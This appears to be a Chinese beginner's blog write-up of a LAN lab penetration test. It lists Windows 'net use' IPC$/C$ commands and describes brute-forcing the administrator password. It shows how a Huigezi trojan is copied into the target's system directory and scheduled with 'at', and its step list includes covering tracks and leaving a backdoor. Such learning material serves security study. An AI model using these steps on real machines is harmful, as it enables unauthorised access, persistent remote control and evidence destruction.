¦前言:
再怎么说也学习了半个月左右的web渗透基础,也应该进行一些简单的实际操作了,不过此次是在内网进行,所以说还是太嫩
⋅基本步骤
0:授权(自己给自己授权,hhh)
1:信息收集(有很多步骤)例如:
nslookup 收集域名和IP地址 whois 收集子域名 等
2:扫描漏洞(分为:笼统扫描 深度扫描)
例如:namp(一个比较出名的软件 ,可用于扫描目标IP范围 端口(明确了开启了什么端口,可能某个端口背后本身提供的服务是有问题的))
3:漏洞利用
4:提权(shell环境 桌面环境 最高权限)
5:毁尸灭迹
6:留后门
7:渗透测试报告
•实验开始
科普:
445端口 可以在局域网中轻松访问各种共享文件夹或共享打印机
23端口:23端口是telnet的端口。Telnet协议是TCP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。
IPC$(Internet Process Connection)是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT/2000在提供了ipc$功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。所有的这些,微软的初衷都是为了方便管理员的理,但在有意无意管中,导致了系 统安全性的降低。
1:配置内网IP,组建局域网 攻击机ip(10.1.1.2),靶机ip(10.1.1.1)
2:准备工具(scanport,不用namp),扫描开放端口
可以看到445 23端口是打开的
net use \\10.1.1.2\ipc$ 密码 /user:用户
=====================================
net use f: \\10.1.1.2\share 密码 /user:用户
net use f: /del
net use * /del
net use f: \\10.1.1.2\c$ 密码 /user:用户
利用CMD窗口链接
在不知道系统密码的情况下(假设用户名已知为administrator),暴力破解系统密码
使用工具NTscan,密码字典生成器(可以利用社会工程学生产密码字典)
找到密码 (因为将密码特意放入字典中去,毕竟只是测试)
成功映射对方的硬盘
可以看到整个C盘
留后门:
工具(灰鸽子)
现在也只能用现成的工具,以后有机会学习kali的话,工具可以自己写QAQ
有了这个木马后门,可以随时控制肉鸡
建立文件后,DOS命令copy文件到靶机电脑上(copy cd: xxx.exe \\10.1.1.1\c$\windows\systems32\),并且 使用 at \\10.1.1.1 时间 “路径” 定时执行木马
最后:
仅供新手学习使用~~~